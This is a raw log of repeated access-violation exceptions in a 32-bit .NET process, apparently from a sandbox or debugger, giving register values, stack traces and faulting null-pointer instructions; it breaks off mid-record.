exception.exception_code: 0xc0000005
exception.symbol:
exception.address: 0x495d3f8
registers.esp: 33746852
registers.edi: 33746904
registers.eax: 0
registers.ebp: 33746916
registers.edx: 3296008
registers.ebx: 33748356
registers.esi: 39330464
registers.ecx: 0
1 0 0

__exception__

 stacktrace: 
0xa7c73e8
0xa7c334c
0xa7c2be2
0xa7c2ab5
0xa7c136b
0xa7c0501
0x495d9ff
0x4957855
0x4956f0b
0x4953c6b
0x49535d9
DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x72ee2652
DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x72ef264f
DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x72ef2e95
DllGetClassObjectInternal+0x2473 CorDllMainForThunk-0x8a088 clr+0xc74ec @ 0x72fa74ec
DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x72fa7610
CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x73031dc4
CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x73031e67
CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x73031f7a
_CorExeMain+0x1c ClrCreateManagedInstance-0x35cd clr+0x15416a @ 0x7303416a
_CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x73ebf5a3
CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 @ 0x73f37f16
_CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x73f34de3
RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x778d9ed2
RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x778d9ea5

exception.instruction_r: 8b 40 04 89 45 fc 90 eb 00 8b 45 fc 8b e5 5d c3
exception.instruction: mov eax, dword ptr [eax + 4]
exception.exception_code: 0xc0000005
exception.symbol:
exception.address: 0xa7c742b
registers.esp: 33745380
registers.edi: 33745724
registers.eax: 0
registers.ebp: 33745388
registers.edx: 0
registers.ebx: 33748356
registers.esi: 39957812
registers.ecx: 41084276
1 0 0

__exception__

 stacktrace: 
0xa7c73e8
0xa7c334c
0xa7c2be2
0xa7c2acd
0xa7c136b
0xa7c0501
0x495d9ff
0x4957855
0x4956f0b
0x4953c6b
0x49535d9
DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x72ee2652
DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x72ef264f
DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x72ef2e95
DllGetClassObjectInternal+0x2473 CorDllMainForThunk-0x8a088 clr+0xc74ec @ 0x72fa74ec
DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x72fa7610
CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x73031dc4
CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x73031e67
CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x73031f7a
_CorExeMain+0x1c ClrCreateManagedInstance-0x35cd clr+0x15416a @ 0x7303416a
_CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x73ebf5a3
CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 @ 0x73f37f16
_CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x73f34de3
RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x778d9ed2
RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x778d9ea5

exception.instruction_r: 8b 40 04 89 45 fc 90 eb 00 8b 45 fc 8b e5 5d c3
exception.instruction: mov eax, dword ptr [eax + 4]
exception.exception_code: 0xc0000005
exception.symbol:
exception.address: 0xa7c742b
registers.esp: 33745380
registers.edi: 33745724
registers.eax: 0
registers.ebp: 33745388
registers.edx: 0
registers.ebx: 33748356
registers.esi: 39957812
registers.ecx: 42388968
1 0 0

__exception__

 stacktrace: 
0xa7c73e8
0xa7c334c
0xa7c2be2
0xa7c2acd
0xa7c136b
0xa7c0501
0x495d9ff
0x4957855
0x4956f0b
0x4953c6b
0x49535d9
DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x72ee2652
DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x72ef264f
DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x72ef2e95
DllGetClassObjectInternal+0x2473 CorDllMainForThunk-0x8a088 clr+0xc74ec @ 0x72fa74ec
DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x72fa7610
CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x73031dc4
CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x73031e67
CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x73031f7a
_CorExeMain+0x1c ClrCreateManagedInstance-0x35cd clr+0x15416a @ 0x7303416a
_CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x73ebf5a3
CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 @ 0x73f37f16
_CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x73f34de3
RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x778d9ed2
RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x778d9ea5

exception.instruction_r: 8b 40 04 89 45 fc 90 eb 00 8b 45 fc 8b e5 5d c3
exception.instruction: mov eax, dword ptr [eax + 4]
exception.exception_code: 0xc0000005
exception.symbol:
exception.address: 0xa7c742b
registers.esp: 33745380
registers.edi: 33745724
registers.eax: 0
registers.ebp: 33745388
registers.edx: 0
registers.ebx: 33748356
registers.esi: 39957812
registers.ecx: 39835432
1 0 0

__exception__

 stacktrace: 
0xa7c73e8
0xa7c7ef6
0xa7c77b1
0xa7c2ab5
0xa7c1654
0xa7c0501
0x495d9ff
0x4957855
0x4956f0b
0x4953c6b
0x49535d9
DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x72ee2652
DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x72ef264f
DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x72ef2e95
DllGetClassObjectInternal+0x2473 CorDllMainForThunk-0x8a088 clr+0xc74ec @ 0x72fa74ec
DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x72fa7610
CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x73031dc4
CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x73031e67
CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x73031f7a
_CorExeMain+0x1c ClrCreateManagedInstance-0x35cd clr+0x15416a @ 0x7303416a
_CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x73ebf5a3
CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 @ 0x73f37f16
_CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x73f34de3
RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x778d9ed2
RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x778d9ea5

exception.instruction_r: 8b 40 04 89 45 fc 90 eb 00 8b 45 fc 8b e5 5d c3
exception.instruction: mov eax, dword ptr [eax + 4]
exception.exception_code: 0xc0000005
exception.symbol:
exception.address: 0xa7c742b
registers.esp: 33745356
registers.edi: 33745748
registers.eax: 0
registers.ebp: 33745364
registers.edx: 0
registers.ebx: 33748356
registers.esi: 38917204
registers.ecx: 41144272
1 0 0

__exception__

 stacktrace: 
0xa7c73e8
0xa7c7ef6
0xa7c77b1
0xa7c2acd
0xa7c1654
0xa7c0501
0x495d9ff
0x4957855
0x4956f0b
0x4953c6b
0x49535d9
DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x72ee2652
DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x72ef264f
DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x72ef2e95
DllGetClassObjectInternal+0x2473 CorDllMainForThunk-0x8a088 clr+0xc74ec @ 0x72fa74ec
DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x72fa7610
CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x73031dc4
CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x73031e67
CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x73031f7a
_CorExeMain+0x1c ClrCreateManagedInstance-0x35cd clr+0x15416a @ 0x7303416a
_CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x73ebf5a3
CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 @ 0x73f37f16
_CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x73f34de3
RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x778d9ed2
RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x778d9ea5

exception.instruction_r: 8b 40 04 89 45 fc 90 eb 00 8b 45 fc 8b e5 5d c3
exception.instruction: mov eax, dword ptr [eax + 4]
exception.exception_code: 0xc0000005
exception.symbol:
exception.address: 0xa7c742b
registers.esp: 33745356
registers.edi: 33745748
registers.eax: 0
registers.ebp: 33745364
registers.edx: 0
registers.ebx: 33748356
registers.esi: 38917204
registers.ecx: 42491024
1 0 0

__exception__

 stacktrace: 
0xa7c73e8
0xa7c7ef6
0xa7c77b1
0xa7c2acd
0xa7c1654
0xa7c0501
0x495d9ff
0x4957855
0x4956f0b
0x4953c6b
0x49535d9
DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x72ee2652
DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x72ef264f
DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x72ef2e95
DllGetClassObjectInternal+0x2473 CorDllMainForThunk-0x8a088 clr+0xc74ec @ 0x72fa74ec
DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x72fa7610
CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x73031dc4
CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x73031e67
CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x73031f7a
_CorExeMain+0x1c ClrCreateManagedInstance-0x35cd clr+0x15416a @ 0x7303416a
_CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x73ebf5a3
CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 @ 0x73f37f16
_CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x73f34de3
RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x778d9ed2
RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x778d9ea5

exception.instruction_r: 8b 40 04 89 45 fc 90 eb 00 8b 45 fc 8b e5 5d c3
exception.instruction: mov eax, dword ptr [eax + 4]
exception.exception_code: 0xc0000005
exception.symbol:
exception.address: 0xa7c742b
registers.esp: 33745356
registers.edi: 33745748
registers.eax: 0
registers.ebp: 33745364
registers.edx: 0
registers.ebx: 33748356
registers.esi: 38917204
registers.ecx: 44044880
1 0 0

__exception__

 stacktrace: 
0xa7c73e8
0xa7c8822
0xa7c81c9
0xa7c2ab5
0xa7c176c
0xa7c0501
0x495d9ff
0x4957855
0x4956f0b
0x4953c6b
0x49535d9
DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x72ee2652
DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x72ef264f
DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x72ef2e95
DllGetClassObjectInternal+0x2473 CorDllMainForThunk-0x8a088 clr+0xc74ec @ 0x72fa74ec
DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x72fa7610
CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x73031dc4
CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x73031e67
CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x73031f7a
_CorExeMain+0x1c ClrCreateManagedInstance-0x35cd clr+0x15416a @ 0x7303416a
_CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x73ebf5a3
CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 @ 0x73f37f16
_CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x73f34de3
RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x778d9ed2
RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x778d9ea5

exception.instruction_r: 8b 40 04 89 45 fc 90 eb 00 8b 45 fc 8b e5 5d c3
exception.instruction: mov eax, dword ptr [eax + 4]
exception.exception_code: 0xc0000005
exception.symbol:
exception.address: 0xa7c742b
registers.esp: 33745408
registers.edi: 33745748
registers.eax: 0
registers.ebp: 33745416
registers.edx: 0
registers.ebx: 33748356
registers.esi: 38917204
registers.ecx: 38920288
1 0 0

__exception__

 stacktrace: 
0xa7c73e8
0xa7c8822
0xa7c81c9
0xa7c2acd
0xa7c176c
0xa7c0501
0x495d9ff
0x4957855
0x4956f0b
0x4953c6b
0x49535d9
DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x72ee2652
DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x72ef264f
DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x72ef2e95
DllGetClassObjectInternal+0x2473 CorDllMainForThunk-0x8a088 clr+0xc74ec @ 0x72fa74ec
DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x72fa7610
CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x73031dc4
CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x73031e67
CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x73031f7a
_CorExeMain+0x1c ClrCreateManagedInstance-0x35cd clr+0x15416a @ 0x7303416a
_CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x73ebf5a3
CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 @ 0x73f37f16
_CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x73f34de3
RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x778d9ed2
RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x778d9ea5

exception.instruction_r: 8b 40 04 89 45 fc 90 eb 00 8b 45 fc 8b e5 5d c3
exception.instruction: mov eax, dword ptr [eax + 4]
exception.exception_code: 0xc0000005
exception.symbol:
exception.address: 0xa7c742b
registers.esp: 33745408
registers.edi: 33745748
registers.eax: 0
registers.ebp: 33745416
registers.edx: 0
registers.ebx: 33748356
registers.esi: 38904716
registers.ecx: 40286800
1 0 0

__exception__

 stacktrace: 
0xa7c73e8
0xa7c8822
0xa7c81c9
0xa7c2acd
0xa7c176c
0xa7c0501
0x495d9ff
0x4957855
0x4956f0b
0x4953c6b
0x49535d9
DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x72ee2652
DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x72ef264f
DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x72ef2e95
DllGetClassObjectInternal+0x2473 CorDllMainForThunk-0x8a088 clr+0xc74ec @ 0x72fa74ec
DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x72fa7610
CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x73031dc4
CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x73031e67
CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x73031f7a
_CorExeMain+0x1c ClrCreateManagedInstance-0x35cd clr+0x15416a @ 0x7303416a
_CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x73ebf5a3
CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 @ 0x73f37f16
_CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x73f34de3
RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x778d9ed2
RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x778d9ea5

exception.instruction_r: 8b 40 04 89 45 fc 90 eb 00 8b 45 fc 8b e5 5d c3
exception.instruction: mov eax, dword ptr [eax + 4]
exception.exception_code: 0xc0000005
exception.symbol:
exception.address: 0xa7c742b
registers.esp: 33745408
registers.edi: 33745748
registers.eax: 0
registers.ebp: 33745416
registers.edx: 0
registers.ebx: 33748356
registers.esi: 38904716
registers.ecx: 41680448
1 0 0

__exception__

 stacktrace: 
0xa7c73e8
0xa7c8f34
0xa7c8991
0xa7c2ab5
0xa7c1872
0xa7c0501
0x495d9ff
0x4957855
0x4956f0b
0x4953c6b
0x49535d9
DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x72ee2652
DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x72ef264f
DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x72ef2e95
DllGetClassObjectInternal+0x2473 CorDllMainForThunk-0x8a088 clr+0xc74ec @ 0x72fa74ec
DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x72fa7610
CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x73031dc4
CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x73031e67
CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x73031f7a
_CorExeMain+0x1c ClrCreateManagedInstance-0x35cd clr+0x15416a @ 0x7303416a
_CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x73ebf5a3
CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 @ 0x73f37f16
_CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x73f34de3
RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x778d9ed2
RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x778d9ea5

exception.instruction_r: 8b 40 04 89 45 fc 90 eb 00 8b 45 fc 8b e5 5d c3
exception.instruction: mov eax, dword ptr [eax + 4]
exception.exception_code: 0xc0000005
exception.symbol:
exception.address: 0xa7c742b
registers.esp: 33745440
registers.edi: 33745748
registers.eax: 0
registers.ebp: 33745448
registers.edx: 0
registers.ebx: 33748356
registers.esi: 38904716
registers.ecx: 43074232
1 0 0

__exception__

 stacktrace: 
0xa7c73e8
0xa7c8f34
0xa7c8991
0xa7c2acd
0xa7c1872
0xa7c0501
0x495d9ff
0x4957855
0x4956f0b
0x4953c6b
0x49535d9
DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x72ee2652
DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x72ef264f
DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x72ef2e95
DllGetClassObjectInternal+0x2473 CorDllMainForThunk-0x8a088 clr+0xc74ec @ 0x72fa74ec
DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x72fa7610
CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x73031dc4
CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x73031e67
CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x73031f7a
_CorExeMain+0x1c ClrCreateManagedInstance-0x35cd clr+0x15416a @ 0x7303416a
_CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x73ebf5a3
CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 @ 0x73f37f16
_CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x73f34de3
RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x778d9ed2
RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x778d9ea5

exception.instruction_r: 8b 40 04 89 45 fc 90 eb 00 8b 45 fc 8b e5 5d c3
exception.instruction: mov eax, dword ptr [eax + 4]
exception.exception_code: 0xc0000005
exception.symbol:
exception.address: 0xa7c742b
registers.esp: 33745440
registers.edi: 33745748
registers.eax: 0
registers.ebp: 33745448
registers.edx: 0
registers.ebx: 33748356
registers.esi: 38904716
registers.ecx: 39860216
1 0 0

__exception__

 stacktrace: 
0xa7c73e8
0xa7c8f34
0xa7c8991
0xa7c2acd
0xa7c1872
0xa7c0501
0x495d9ff
0x4957855
0x4956f0b
0x4953c6b
0x49535d9
DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x72ee2652
DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x72ef264f
DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x72ef2e95
DllGetClassObjectInternal+0x2473 CorDllMainForThunk-0x8a088 clr+0xc74ec @ 0x72fa74ec
DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x72fa7610
CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x73031dc4
CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x73031e67
CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x73031f7a
_CorExeMain+0x1c ClrCreateManagedInstance-0x35cd clr+0x15416a @ 0x7303416a
_CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x73ebf5a3
CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 @ 0x73f37f16
_CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x73f34de3
RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x778d9ed2
RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x778d9ea5

exception.instruction_r: 8b 40 04 89 45 fc 90 eb 00 8b 45 fc 8b e5 5d c3
exception.instruction: mov eax, dword ptr [eax + 4]
exception.exception_code: 0xc0000005
exception.symbol:
exception.address: 0xa7c742b
registers.esp: 33745440
registers.edi: 33745748
registers.eax: 0
registers.ebp: 33745448
registers.edx: 0
registers.ebx: 33748356
registers.esi: 38904716
registers.ecx: 41256488
1 0 0

__exception__

 stacktrace: 
0xa7c73e8
0xa7ca2bb
0xa7c9866
0xa7c0559
0x495d9ff
0x4957855
0x4956f0b
0x4953c6b
0x49535d9
DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x72ee2652
DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x72ef264f
DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x72ef2e95
DllGetClassObjectInternal+0x2473 CorDllMainForThunk-0x8a088 clr+0xc74ec @ 0x72fa74ec
DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x72fa7610
CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x73031dc4
CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x73031e67
CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x73031f7a
_CorExeMain+0x1c ClrCreateManagedInstance-0x35cd clr+0x15416a @ 0x7303416a
_CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x73ebf5a3
CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 @ 0x73f37f16
_CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x73f34de3
RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x778d9ed2
RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x778d9ea5

exception.instruction_r: 8b 40 04 89 45 fc 90 eb 00 8b 45 fc 8b e5 5d c3
exception.instruction: mov eax, dword ptr [eax + 4]
exception.exception_code: 0xc0000005
exception.symbol:
exception.address: 0xa7c742b
registers.esp: 33746260
registers.edi: 33746524
registers.eax: 0
registers.ebp: 33746268
registers.edx: 0
registers.ebx: 33748356
registers.esi: 41825396
registers.ecx: 41832372
1 0 0

__exception__

 stacktrace: 
0x22f9641
0x22f9443
0x22f7710
0x22f6f0b
0x22f3c6b
0x22f35d9
DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x72df2652
DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x72e0264f
DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x72e02e95
DllGetClassObjectInternal+0x2473 CorDllMainForThunk-0x8a088 clr+0xc74ec @ 0x72eb74ec
DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x72eb7610
CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x72f41dc4
CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x72f41e67
CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x72f41f7a
_CorExeMain+0x1c ClrCreateManagedInstance-0x35cd clr+0x15416a @ 0x72f4416a
_CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x73ebf5a3
CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 @ 0x73f37f16
_CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x73f34de3
RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x778d9ed2
RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x778d9ea5

exception.instruction_r: 8b 01 8b 40 28 ff 10 89 45 c8 8b 45 c8 89 45 c4
exception.instruction: mov eax, dword ptr [ecx]
exception.exception_code: 0xc0000005
exception.symbol:
exception.address: 0x22f9778
registers.esp: 34795428
registers.edi: 34795480
registers.eax: 0
registers.ebp: 34795492
registers.edx: 5393160
registers.ebx: 34796932
registers.esi: 40350960
registers.ecx: 0
1 0 0

__exception__

 stacktrace: 
0xa7bc6e8
0xa7b864c
0xa7b7ee2
0xa7b7db5
0xa7b666b
0xa7b5801
0x22fd9ff
0x22f7855
0x22f6f0b
0x22f3c6b
0x22f35d9
DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x72df2652
DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x72e0264f
DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x72e02e95
DllGetClassObjectInternal+0x2473 CorDllMainForThunk-0x8a088 clr+0xc74ec @ 0x72eb74ec
DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x72eb7610
CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x72f41dc4
